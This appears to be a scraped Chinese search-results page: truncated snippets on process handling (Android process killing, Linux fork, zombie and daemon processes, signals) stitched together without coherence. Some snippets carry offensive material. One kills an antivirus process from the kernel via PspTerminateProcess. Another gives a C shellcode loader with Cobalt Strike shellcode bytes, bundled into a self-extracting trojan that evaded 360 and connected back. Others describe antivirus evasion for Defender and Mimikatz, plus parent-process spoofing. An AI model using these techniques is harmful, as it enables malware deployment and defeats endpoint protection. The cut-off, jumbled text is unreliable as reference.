文章目录 一、Android 杀后台进程 二、Android 杀前台进程 三、Android 杀其它进程 一、Android 杀后台进程 ---- 使用 Android 的进程 api 类 android.os.Process...杀死进程 : android.os.Process.killProcess(android.os.Process.myPid()); 如果当前进程处于前台 , 杀死该进程后 , Android 系统会重启该进程...0 表示正常退出 , 传入其它值表示非正常退出 ; java.lang.System.exit(0); 如果当前进程处于前台 , 杀死该进程后 , Android 系统会重启该进程 , 这是 Android..., 应用进程会重新启动 ; 二、Android 杀前台进程 ---- 关闭了所有的 Activity 界面窗口 , 应用进程自然就被杀死了 ; activity.finishAffinity(); 上述代码可以关闭所有的本任务栈内的...使用 Java 的进程 api 类 `java.lang.System` 杀死进程 java.lang.System.exit(0); 三、Android 杀其它进程 ---- 获取 ActivityManager
1.进程ID 每一个进程都由一个唯一的标识符表示,即进程ID,简称pid.系统保证在某时刻每个pid都是唯一的。...1.1分配进程ID 缺省情况下,内核将进程ID的最大值限制为32768,可以在此处设置/proc/sys/kernel/pid_max,在短时间内,内核不会重用已经分配的ID. 2.获得进程id和父进程...当前进程就是父进程,创建成功的进程是子进程。...在父进程成功的fork()调用,会返回子进程的pid 在子进程fork()调用会返回0 #include #include int main(){...,pid=%d , ppid=%d ,我新建的子进程pid=%d\n",pi d,ppid,ret); sleep(3);//父进程不能太快终止,否则看不出子进程ppid
进程 每个进程在内核中都有一个进程控制块(PCB)来维护进程相关的信息,Linux内核的进程控制块是task_struct结构体。进程id。系统中每个进程有唯一的id,在C语言中用pid_t类型表示。...内核根据父进程复制出一个子进程,父进程和子进程的PCB信息相同,用户态代码和数据也相同。因此,子进程现在的状态看起来和父进程一样,做完了初始化,刚调用了fork进入内核,还没有从内核返回。...是父进程先返回还是子进程先返回,还是这两个进程都等待,先去调度执行别的进程,这都不一定,取决于内核的调度算法。...任何进程在刚终止时都是僵尸进程,正常情况下,僵尸进程都立刻被父进程清理了。如果一个父进程终止,而它的子进程还存在(这些子进程或者仍在运行,或者已经是僵尸进程了),则这些子进程的父进程改为init进程。...进程间通信每个进程各自有不同的用户地址空间,任何一个进程的全局变量在另一个进程中都看不到,所以进程之间要交换数据必须通过内核,在内核中开辟一块缓冲区,进程1把数据从用户空间拷到内核缓冲区,进程2再从内核缓冲区把数据读走
,那么这时候我们就需要使用的ring0的函数来强行结束一些处于ring0级别的进程。...测试 我们首先打开PCHunter32.exe看一下,应用层是不能够访问的,我们知道可以在cmd里面使用taskkill命令来结束进程,但这种方式对ring0特权级别的程序并不适用。...NTSTATUS值就可以杀死一个进程,但是这里又有一个问题,如果我们想利用这个函数去kill掉一个杀软,那么杀软就直接让我们宰割吗,当然不会。...我们能知道这个内核的函数,那么杀软肯定也知道,所以在ring0层面下,杀软将这个内核函数hook掉,如果发现有调用这个函数kill掉自己的企图,还是会拒绝。...PspTerminateProcess+0x1b (805d349d) 805d3496 b80d0000c0 mov eax,0C000000Dh 805d349b eb5a
守护进程: 必须是init进程的子进程,运行在后台,不与任何控制终端相关联。...通过以下步骤成为守护进程 1.调用fork()创建出来一个新的进程,这个新进程会是将来的守护进程 2.在新守护进程的父进程中,调用exit(),为了守护进程的爷爷进程确认父进程结束 3.在新守护进程中,...调用setsid(),使得该进程有一个新的进程组和新的会话,保证了该进程不与控制终端相关联 4.用chdir()将当前工作目录改为根目录,因为前面fork出来的新进程,当前工作目录可能在文件系统的任何地方...sys/stat.h> #include #include #include #include #include #include #include #include #include #include <linux
void(* handler)=myHandler; //调用函数,传递参数int信号标号,传递函数指针 signal(SIGINT,handler);//捕获ctrl+c...signal(SIGTERM,handler);//捕获程序退出 while(1){ printf("进程运行中......\n"); sleep(1); } } 运行结果: 信号2是我ctrl+c , 信号15是我kill 进程id , 但是当我kill -9...进程id时 , 使用signal(SIGKILL,handler) 信号不能被捕获 进程运行中......进程运行中... 进程运行中... ^C捕获到信号 2 进程运行中... 进程运行中... 进程运行中... 捕获到信号 15
1.等待终止的子进程(僵死进程): 如果一个子进程在父进程之前结束,内核会把子进程设置为一个特殊的状态,处于这种状态的进程称为僵死进程 当父进程获取了子进程的信息后,子进程才会消失。...pid_t wait(int *status); 父进程调用这个方法会被阻塞住,如果子进程终止的时候,此方法会调用并且返回终止子进程的pid #include #include 0){ pid=getpid(); ppid=getppid(); printf("我是父进程...,pid=22315 , ppid=12479 ,我新建的子进程pid=22316 我是子进程,pid=22316 , ppid=22315 我的子进程,pid=22316,终止了 2.如果父进程在子进程之前终止了...,那么系统会把子进程设置给init进程(pid为1),init进程会周期性的等待所有的子进程,确保没有长时间的僵死进程
,那么这时候我们就需要使用的ring0的函数来强行结束一些处于ring0级别的进程。...NTSTATUS值就可以杀死一个进程,但是这里又有一个问题,如果我们想利用这个函数去kill掉一个杀软,那么杀软就直接让我们宰割吗,当然不会。...我们能知道这个内核的函数,那么杀软肯定也知道,所以在ring0层面下,杀软将这个内核函数hook掉,如果发现有调用这个函数kill掉自己的企图,还是会拒绝。...PspTerminateProcess+0x1b (805d349d) 805d3496 b80d0000c0 mov eax,0C000000Dh 805d349b eb5a...再看一下DebugView里面可以看到连接设备过后调用PspTerminateProcess关闭了进程 再通过cmd查看某绒进程HipsMain.exe已经被kill掉
在linux中,进程有一个严格的层次结构,这就是广为人知的进程树。进程树以第一个进程,也就是init进程为根。新进程通过fork()系统调用创建。...fork()复制了调用进程,原进程称为父进程,新进程称为子进程。除了第一个进程外,每一个进程都有父进程。...linux内核实现了大约30个信号,每一个信号由一个数字常亮和文本名表示。除了SIGKILL(进程中断)和SIGSTOP(进程停止)外,进程能够根据接收到的信号进行控制。...4.进程间通讯 允许进程间交换信息和通知彼此所发生的事件是操作系统最重要的工作之一。linux内核实现了传统的unix的进程间通讯(IPC)机制。...linux支持的进程间通讯机制包括管道、命名管道、信号量、消息队列、共享内存、快速用户空间互斥体
这里演示的方式为shellcode框架加载自解压 1.生成shellcode 2.c加载(随便拉的加载器)#include #include #pragma comment(linker,”/subsystem...unsigned char shellcode[] = “\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b” “\x52\x0c\...x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0” “\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01...void main() { ((void(*)(void))&shellcode)(); } 3.自解压捆绑exe 当目标运行正常exe的同时会运行我们的木马 复现 使用cobaltstrike生成c的...更新选择解压并更新文件和覆盖所有文件 点击确认生成捆绑马 点击确认 生成捆绑马 这里环境有360 实验360并未作出拦截 双击运行看是否上线 软件正常打开 并且主机成功上线 这个加载器的免杀效果一般
别人的静态免杀 在Github上看到一个c++的免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒: 项目地址:https://github.com/G73st...复现其他师傅的免杀 2.1 c++部分 其实他这部分代码的逻辑就是一个利用自己的密钥进行解密,解密之后再申请内存,执行shellcode,在这里先将别人的代码下载下来,在本地跑一下: 先把项目下载,然后把...免杀Windows Defender 对于作者一个月以前的更新,可以过Windows Defender,但是现在只能免杀火绒,在这里对此做一个小小的改动,就可以达到以前的那种效果,但是依旧无法过360(...因为免杀一直会被标记,此处的tips暂不提供,希望师傅能够理解) 此时最新版的Windows Defender 上线成功: 但是!!!...当然,在这个免杀中,均属于静态免杀,有些属于乱杀,就像碰到易语言一样,大家都杀!
用ps和grep命令寻找僵尸进程 #ps -A -ostat,ppid,pid,cmd | grep -e '^[Zz]' 命令注解: -A 参数列出所有进程 -o 自定义输出字段 我们设定显示字段为...stat(状态), ppid(进程父id), pid(进程id),cmd(命令)这四个参数 因为状态为 z或者Z的进程为僵尸进程,所以我们使用grep抓取stat状态为zZ进程 运行结果参考如下...Z 12334 12339 /path/cmd 这时,我们可以使用 kill -HUP 12339来杀掉这个僵尸进程 运行后,可以再次运行ps -A -ostat,ppid,pid,cmd | grep...-e '^[Zz]'来确认是否已经将僵尸进程杀死 如果kill 子进程的无效,可以尝试kill 其父进程来解决问题,例如上面例子父进程pid是 12334,那么我们就运行 #kill -HUP 12334...来解决问题 一般可以用top命令发现动态进程表 #top ?
但是发现 kill 该进程平静一会后又启动了。 ? 注:老图复用,PID、COMMAND 都有变化。 2....查看进程的详细信息 [root@zwlbs3 ~]# cd /proc/748/ [root@zwlbs3 748]# ls -ial # "748"是该进程的 PID,根据你的 PID 来查看即可。...发现该进程是在 /dev/shm 目录下的,/dev/shm 是一个什么目录呢?...Linux默认(CentOS)/dev/shm分区的大小是系统物理内存的50%, 虽说使用/dev/shm对文件操作的效率会高很多。...几乎没有找到该进程相关的文件。 3. 解决办法 i. 查看某个进程内部线程占用情况分析 [root@zwlbs3 ~]# top -H -p "PID" ? ii.
一 前言 尝试对Mimikatz进行免杀,提取Mimikatz的shellcode,然后使用免杀的加载器进行加载,用加载器在加载cs shellcode时免杀效果挺好,但在加载Mimikatz的shellcode...图像法减少熵值 在网上没有找到将shellcode封装进图片的代码,自己写又太麻烦,而且不知道免杀效果如何,如果花费大力气写出来发现免杀效果不好不是白忙活了吗?...四 最后 前面讲的熵减法Mimikatz免杀的内容是十几天之前做的,基于intel c++编译器到达的VT全免杀效果,加了一点动态免杀,以过defender动态查杀,第二项的效果图是最近的,此时的intel...c++编译器已被杀软攻陷,在VT上不再具有0查杀的效果,因此效果图中的效果还使用了其它新技术,部分会在下一篇中讲到。...__biz=Mzg5MDg0NzUzMw==&mid=2247483697&idx=1&sn=40d0c408f382325eb3ece0ed7a303f14&chksm=cfd72973f8a0a0654a47c250b2d0dc3fa3239ec9479544a848bc4ec854b106b624427b1d3e90
%c 到达\t进程状态\n", a[k].name); printf("\n\t\t\t\t %s\n\n\n", jczt[processztsy]); if (processnum >= 1)...= 0) { printf("\t\t\t进程 %c 完成\n\n\n\n", a[k].name); } if ((k >= 1 && time >= a[k].arrivetime && time...= 0)) { printf("\t\t\t进程 %c 开始\n\n\n\n", a[k].name); } } if (time > a[n - 1].finishtime && a[n - 1]...= 1; } printf("\t\t进程 %c 到达\t进程状态\n\n\n\n", a[k].name); } } if (jcnum == 0) { //遍历数组 for (int i = jcnum...= 0) { printf("\t\t\t进程 %c 完成\n\n\n\n", a[jcnum - 1].name); //遍历数组 for (int i = jcnum; i < n; i++)
\\C:\\Windows\\System32\\calc.exe"); 然后剩下的参数(除了最后一个)可以全部设置为NULL,最后一个参数Flags用来规范RTL_USER_PROCESS_PARAMETERS_NORMALIZED...,创建进程时,一些输入甚至还没有完全初始化。...\\C:\\Windows\\System32\\calc.exe"); PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL; RtlCreateProcessParametersEx...我们在使用CreateProcess创建进程的时候能通过设置特定的参数来达到欺骗的效果,在NtCreateUserProcess里面也同样能够做到 这里我们首先看一下之前我们生成的进程,可以看到父进程为...explorer 添加代码即可伪造父进程为explorer
-o 自定义输出字段 我们设定显示字段为 stat(状态), ppid(进程父id), pid(进程id),cmd(命令)这四个参数 因为状态为 z或者Z的进程为僵尸进程,所以我们使用grep抓取stat...状态为zZ进程 运行结果参考如下: Z 12334 12339 /path/cmd 这时,我们可以使用 kill -HUP 12339来杀掉这个僵尸进程 运行后,可以再次运行 ps -A -ostat,...ppid,pid,cmd | grep -e '^[Zz]' 来确认是否已经将僵尸进程杀死 如果kill 子进程的无效,可以尝试kill 其父进程来解决问题,例如上面例子父进程pid是 12334,那么我们就运行...kill -HUP 12334 来解决问题 一般可以用top命令发现动态进程表 ?...其中zombie是僵尸进程 - End -
如果对前面Linux进程不太熟悉可以先阅读: Linux进程 本篇主要内容: 僵尸进程和孤儿进程 Linux进程优先级 1. 僵尸进程 僵尸进程就是处于僵尸状态下的进程!...所以,只要子进程退出,父进程还在运行,但父进程没有读取子进程状态,子进程进入Z状态 僵尸状态就是Linux状态中的X死亡状态!...配置进程优先权对多任务环境的linux很有用,可以改善系统性能。...NI :NICE值,表示优先级的修改数据 NICE其取值范围是-20至19,一共40个级别 Linux进程的优先级数值范围:60~99 Linux中默认进程的优先级都是:80 Linux是支持动态优先级调整的...总结 本篇文章前部分紧贴上篇Linux进程,分析完了Linux下常见的进程状态,然后初步了解了Linux进程优先级,而进程优先级与前面内容相差较大,希望大家能够多花点时间理解!
前段时间分享了在线杀软对比源码+数据源(自用),最近又做了些补充,新增了一些杀软和常用的权限提升、信息搜集的进程。欢迎大家补充!...所以搜集整理了下Windows常用到的杀软、提权、信息搜集的进程用于辅助渗透。...奇安信、深信服、火绒安全、电脑管家等; WPS、G6FTP、TeamViewer、ToDesk、AnyDesk、向日葵、护卫神主机卫士、西部数码建站助手等; 注:如果存在有安全防护则需要去做针对性的免杀和绕过测试...0x02 使用方式 目标主机上执行tasklist /svc命令,可输出到文本文件,将查询到的所有进程信息全部拷贝到这个网页的文本框中,然后再点击对应按钮来对比对应的进程信息即可,如果存在则输出。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
